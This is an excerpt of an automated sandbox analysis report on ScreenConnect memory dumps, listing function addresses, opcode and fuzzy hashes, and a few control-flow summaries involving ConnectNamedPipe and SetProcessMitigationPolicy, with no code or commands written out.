                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ]H
                                                                                                                                                                                                                                                        • API String ID: 0-530538235
                                                                                                                                                                                                                                                        • Opcode ID: d613954af35eb40c2020220ffb891996bb989b2402ccaff59afdd41b3f0be8fb
                                                                                                                                                                                                                                                        • Instruction ID: 53e5c10095a7096dba6f87ed1a823485e8288ec5b1e972c08fa3848a57ed2fc2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d613954af35eb40c2020220ffb891996bb989b2402ccaff59afdd41b3f0be8fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD19331E1D98B8FEABABE2884556B966D2EF953D4F544079D40EC31C6DE3CBC028B41
                                                                                                                                                                                                                                                        Function 00007FF8491655DB Relevance: .4, Instructions: 392COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 468ef5aad1ae5d88152b91b4dd285ef62f3a782100f937d182fd67bff8fb71f8
                                                                                                                                                                                                                                                        • Instruction ID: d40e4b32b6a3b80885d1aad312aab58671d13f16de8952e51c8f7977b6ce1e78
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 468ef5aad1ae5d88152b91b4dd285ef62f3a782100f937d182fd67bff8fb71f8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C1A331E1D98B4FE6AABA2884656B976D2EF943D4F94407DD04EC32C6DE3CBC418B41
                                                                                                                                                                                                                                                        Function 00007FF849162140 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (MH$PQH
                                                                                                                                                                                                                                                        • API String ID: 0-2614825812
                                                                                                                                                                                                                                                        • Opcode ID: 781dc277813b9905f61a6a356184cc438f22d04beb21d86986db1155b7d253e3
                                                                                                                                                                                                                                                        • Instruction ID: 0d2326f58d4af7e006ab82087814a25c0e765fd7c6381f12bf0761164e77374b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 781dc277813b9905f61a6a356184cc438f22d04beb21d86986db1155b7d253e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5891F672E0C98A4FEBA9EF289855AB537E1FF55350B0405BDD44EC7196DE29FC028B80
                                                                                                                                                                                                                                                        Function 00007FF848E58014 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: f2ad7b4c54dfba9d9131cb23c34e06321f371cf1329de5666e26cdfbf0957611
                                                                                                                                                                                                                                                        • Instruction ID: ad99e4951ad287c153cb886ab72a57cb6a6af420ee71381f9409ce9d04f764e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2ad7b4c54dfba9d9131cb23c34e06321f371cf1329de5666e26cdfbf0957611
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81513771C0CB594FDB19ABA8984A5FABBE0EF56350F04017FE049C3192DF78A846CB91
                                                                                                                                                                                                                                                        Function 00007FF849164675 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1208 7ff849164675-7ff849164681 1209 7ff849164685-7ff8491646a1 1208->1209 1210 7ff849164683 1208->1210 1216 7ff8491646a8-7ff8491646aa 1209->1216 1210->1209 1211 7ff8491646c5-7ff8491646cb 1210->1211 1213 7ff8491646cd-7ff8491646e2 1211->1213 1214 7ff8491646e4-7ff8491646f9 1211->1214 1213->1214 1218 7ff8491646fb-7ff849164736 1214->1218 1219 7ff849164743-7ff849164782 1214->1219 1220 7ff849164739-7ff849164742 1216->1220 1221 7ff8491646b0-7ff8491646c3 1216->1221 1218->1220 1228 7ff8491647cc-7ff8491647cf 1219->1228 1229 7ff849164784-7ff849164786 1219->1229 1221->1211 1232 7ff84916484b 1228->1232 1233 7ff8491647d1 1228->1233 1231 7ff849164787-7ff849164791 1229->1231 1236 7ff84916484c-7ff849164856 1232->1236 1237 7ff849164817-7ff849164824 1233->1237 1238 7ff8491647d3-7ff8491647db 1233->1238 1246 7ff849164858 1236->1246 1239 7ff849164827-7ff84916484a 1237->1239 1238->1236 1240 7ff8491647dd-7ff8491647df 1238->1240 1239->1232 1243 7ff84916485b-7ff849164864 1240->1243 1244 7ff8491647e1 1240->1244 1248 7ff849164866-7ff84916486d 1243->1248 1244->1239 1247 7ff8491647e3-7ff8491647e7 1244->1247 1246->1243 1247->1246 1249 7ff8491647e9-7ff8491647ee 1247->1249 1250 7ff84916486f-7ff849164878 1248->1250 1249->1250 1251 7ff8491647f0-7ff8491647f5 1249->1251 1253 7ff84916487d-7ff849164898 1250->1253 1251->1248 1252 7ff8491647f7-7ff8491647fc 1251->1252 1252->1253 1254 7ff8491647fe-7ff849164812 1252->1254 1258 7ff8491649b8-7ff8491649ca 1253->1258 1259 7ff84916489e-7ff8491648a4 1253->1259 1254->1237 1254->1258 1259->1258 1260 7ff8491648aa-7ff8491648b0 1259->1260 1260->1258 1261 7ff8491648b6-7ff8491648bc 1260->1261 1261->1258 1262 7ff8491648c2-7ff849164942 1261->1262 1262->1258 1270 7ff849164944-7ff849164959 call 7ff8491638f8 1262->1270 1273 7ff84916495e-7ff849164960 1270->1273 1273->1258 1274 7ff849164962-7ff84916497e call 7ff8491638f8 1273->1274 1274->1258 1278 7ff849164980-7ff849164988 1274->1278 1278->1258 1279 7ff84916498a-7ff8491649b7 call 7ff8491638f8 1278->1279
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P'H
                                                                                                                                                                                                                                                        • API String ID: 0-2816453460
                                                                                                                                                                                                                                                        • Opcode ID: 362377eed257f4d42e91b13f740eb377fa19369255a4b6c60be93f3f8cce3140
                                                                                                                                                                                                                                                        • Instruction ID: 484081597f0fa1e2fa29ec9e6030a89fd187437c64f3d388b2f5a2c04a378737
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 362377eed257f4d42e91b13f740eb377fa19369255a4b6c60be93f3f8cce3140
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01B10532D0D98A5FEB6AFE2894424F537D1EF65790B5401BED44E871C7EE18BC0A8B81
                                                                                                                                                                                                                                                        Function 00007FF848E5365B Relevance: 1.6, APIs: 1, Instructions: 122pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1283 7ff848e5365b-7ff848e75860 ConnectNamedPipe 1289 7ff848e75868-7ff848e758b0 call 7ff848e758b1 1283->1289 1290 7ff848e75862 1283->1290 1290->1289
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: 8b991bf8183c8e18756bed9b405a5cb3a9565a08d005e90268e222ae757cf682
                                                                                                                                                                                                                                                        • Instruction ID: ee79d4ae3d2acfe6b7f80424e9b4d075051d6631c0aa88377c176e7659fa25fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b991bf8183c8e18756bed9b405a5cb3a9565a08d005e90268e222ae757cf682
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4316B70D08A1C8FEB58EF98D849BE9B7F1FB99311F00826AD04DD7255DB74A885CB81
                                                                                                                                                                                                                                                        Function 00007FF848E53652 Relevance: 1.6, APIs: 1, Instructions: 120pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1294 7ff848e53652-7ff848e75860 ConnectNamedPipe 1298 7ff848e75868-7ff848e758b0 call 7ff848e758b1 1294->1298 1299 7ff848e75862 1294->1299 1299->1298
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: 01d4c72fcaf4fa031b8f4ec91d14f4c682b445154280eab2e71f01bdf5b178b4
                                                                                                                                                                                                                                                        • Instruction ID: 5f4232666a0c64bf7ca19a54bc1b131e9cc38de917d09ff561fb73563c08039e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01d4c72fcaf4fa031b8f4ec91d14f4c682b445154280eab2e71f01bdf5b178b4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1315A71908A1C8FEB58EF98D849BE9B7F1FB98311F00826AD44DD7255DB70A885CB81
                                                                                                                                                                                                                                                        Function 00007FF848E53A92 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1303 7ff848e53a92-7ff848e580ef 1305 7ff848e580f6-7ff848e58150 SetProcessMitigationPolicy 1303->1305 1306 7ff848e58158-7ff848e58187 1305->1306 1307 7ff848e58152 1305->1307 1307->1306
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3297581500.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff848e50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: fd553445a07048e677ce3cbd27cb4af96409c76025bc0d9e9d430970f2da09ab
                                                                                                                                                                                                                                                        • Instruction ID: 5843088a18c668674109120615881ea420ec25cfd568d1beca5a6187496f55e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd553445a07048e677ce3cbd27cb4af96409c76025bc0d9e9d430970f2da09ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121093191CB188FDB18AF9CD84A6FABBE0EB55711F00013FE049D3211DB74B8458B91
                                                                                                                                                                                                                                                        Function 00007FF8491638F8 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8a80d1f98f5353131fe8e0c6b5d766748a1e8eb96a2febe66af722ddef9d1efc
                                                                                                                                                                                                                                                        • Instruction ID: fe3b143b4cf493e34199a4021038cb4150360e4f0cc5c58b293cd09b44a0cb7f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a80d1f98f5353131fe8e0c6b5d766748a1e8eb96a2febe66af722ddef9d1efc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5710A32F1CB4A4FEBA96D2C648927533C1FBA97A5B40017ED58AC3256ED29EC434681
                                                                                                                                                                                                                                                        Function 00007FF849164793 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fe92e1779de18d86e7a92f9d3f4959319eee5ec73cd2ada3d82801b773fd1e3c
                                                                                                                                                                                                                                                        • Instruction ID: 23c86496a06528a52bb6bdfe834e3fc6048f64e18d8bbb04529f07ec2d6fd01c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe92e1779de18d86e7a92f9d3f4959319eee5ec73cd2ada3d82801b773fd1e3c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2719032D0C94A5FDB69FE18D4428F573E1FF69390B500279D44A835C6EE29FD4A8B80
                                                                                                                                                                                                                                                        Function 00007FF8491664B7 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f8d7dac32077da8f9cc7ad3d9181ec66c127667156aa74c83d363ae0ff29723a
                                                                                                                                                                                                                                                        • Instruction ID: 2aa6dce9f770d8c89b17b0a825862be3c007e4be96292e847f7e047b691a3f72
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8d7dac32077da8f9cc7ad3d9181ec66c127667156aa74c83d363ae0ff29723a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA818171E1DA578FEBBABA6480556B966D2BF943C4F944039D00EC3286DE3CBC418A40
                                                                                                                                                                                                                                                        Function 00007FF8491679E3 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8cb6f5f5a38a4a21f2e02f5450a90be389c9cd989428e745c79bb8be58361adb
                                                                                                                                                                                                                                                        • Instruction ID: 18a23d4622b5b1ccd4443e81a46ee58f8201414846853279932bb2bf86579110
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cb6f5f5a38a4a21f2e02f5450a90be389c9cd989428e745c79bb8be58361adb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B541D932E0DA8A8FEB66EE19A8501E977A1FFD4754F18017AD04CC3296DF295D06CB41
                                                                                                                                                                                                                                                        Function 00007FF849167B1A Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7dd3b93306cf8f6333b7da6ff7a61ce099d5719a590b1b07bf3fe4a5277612fb
                                                                                                                                                                                                                                                        • Instruction ID: c367931a72e717563e635e42c99d07b3c98929caaecfd68e22c8071ccd195362
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dd3b93306cf8f6333b7da6ff7a61ce099d5719a590b1b07bf3fe4a5277612fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B621F631D0DB894FD7AAAF3598511A5BBE1FFC5364B0802BAD04DC3196DB2CAC46CB51
                                                                                                                                                                                                                                                        Function 00007FF849161FDA Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1490400709738937055637f5c628996b51ac538a9d452b4e75c4bc5665ef2d7d
                                                                                                                                                                                                                                                        • Instruction ID: cadc7942c562c072aa5677c43bf8e6a0bf1c4e4de4712121aa0e09743070f5a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1490400709738937055637f5c628996b51ac538a9d452b4e75c4bc5665ef2d7d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49319171A0DA868FD799EF28C454AB977E1FF58344F0445BDD449CB296CA29BC01CB81
                                                                                                                                                                                                                                                        Function 00007FF849164B1D Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a138905d5f19db10c0a4434a1ab3af044aba617ded5ac089a52102f56c7bd275
                                                                                                                                                                                                                                                        • Instruction ID: 8a7a7e14a48ea96e4fd6c1ec5fe715a13d28dffa897d32f7a5ac5991bba434c8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a138905d5f19db10c0a4434a1ab3af044aba617ded5ac089a52102f56c7bd275
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5211B471D0DA898FEFA5EF6898552F87BA0FFA5345F0500AAD058C32D6CB285C01CB02
                                                                                                                                                                                                                                                        Function 00007FF849167EC2 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: da683677dba897b369de84bb6d389abaa0197f9a466dcef3d84674ed50ede9af
                                                                                                                                                                                                                                                        • Instruction ID: d3861ef237b2e8304a2633f0344aa0075a176d3c43f22ae0e9310c66af7318d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da683677dba897b369de84bb6d389abaa0197f9a466dcef3d84674ed50ede9af
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9511C832F0DA894FFB66AB7C28202F83692EF84394F1404E6D15CC3292CE2D5D008A85
                                                                                                                                                                                                                                                        Function 00007FF849163675 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ac145fa9aa10aa8b7b609badf1e3837bea1013e5a565a61cc3b4fdd2affb3089
                                                                                                                                                                                                                                                        • Instruction ID: de302670ffa3b884fe14ac600479b7f7dc678efa690cf8db66323b69f88fdfa6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac145fa9aa10aa8b7b609badf1e3837bea1013e5a565a61cc3b4fdd2affb3089
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92116A3044E7C99FC7479B648C259953FB4EE8725470A01E7E089CB1B3D62D8A5BCBA2
                                                                                                                                                                                                                                                        Function 00007FF84916226E Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e5ce7c858fdde56d3e960df6de9c19ac746f32bbeb918d6959b8ff33e691c95
                                                                                                                                                                                                                                                        • Instruction ID: 1203b1626d0ce92bef618cb933e0e402bb055dad33add1515c365e02c0e6fade
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e5ce7c858fdde56d3e960df6de9c19ac746f32bbeb918d6959b8ff33e691c95
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B114C31E0C98A8FDAE9EF28C445B6577A1FF58354F1445FCC44ECB296CA28EC458B84
                                                                                                                                                                                                                                                        Function 00007FF8491622D7 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5b658d14ce7fb5571b154615a7708795cb9885935d561699b4d58cd242c7793c
                                                                                                                                                                                                                                                        • Instruction ID: 2a1825afe81fa974c3b6c9f04ab0a05ffa24d5170683dcce1ae293ec758448ef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b658d14ce7fb5571b154615a7708795cb9885935d561699b4d58cd242c7793c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31114931E0C98A8FDAD9EF28C445BA577A1FF58354F1441E8C44ECB296CA28EC458B84
                                                                                                                                                                                                                                                        Function 00007FF849164039 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a616ee7a01dfa329717297d172cde0313ab40c243c541014e0b8a324302d5eb9
                                                                                                                                                                                                                                                        • Instruction ID: 0f2bc066c6e4d81526dd4d36bb568ea66d2e622b095b8cb9f53762237b268a99
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a616ee7a01dfa329717297d172cde0313ab40c243c541014e0b8a324302d5eb9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25112515D0DAA30FF7BAA62844643B56AE1EF81380F0D81BAC449C61D6DD2DAC818B02
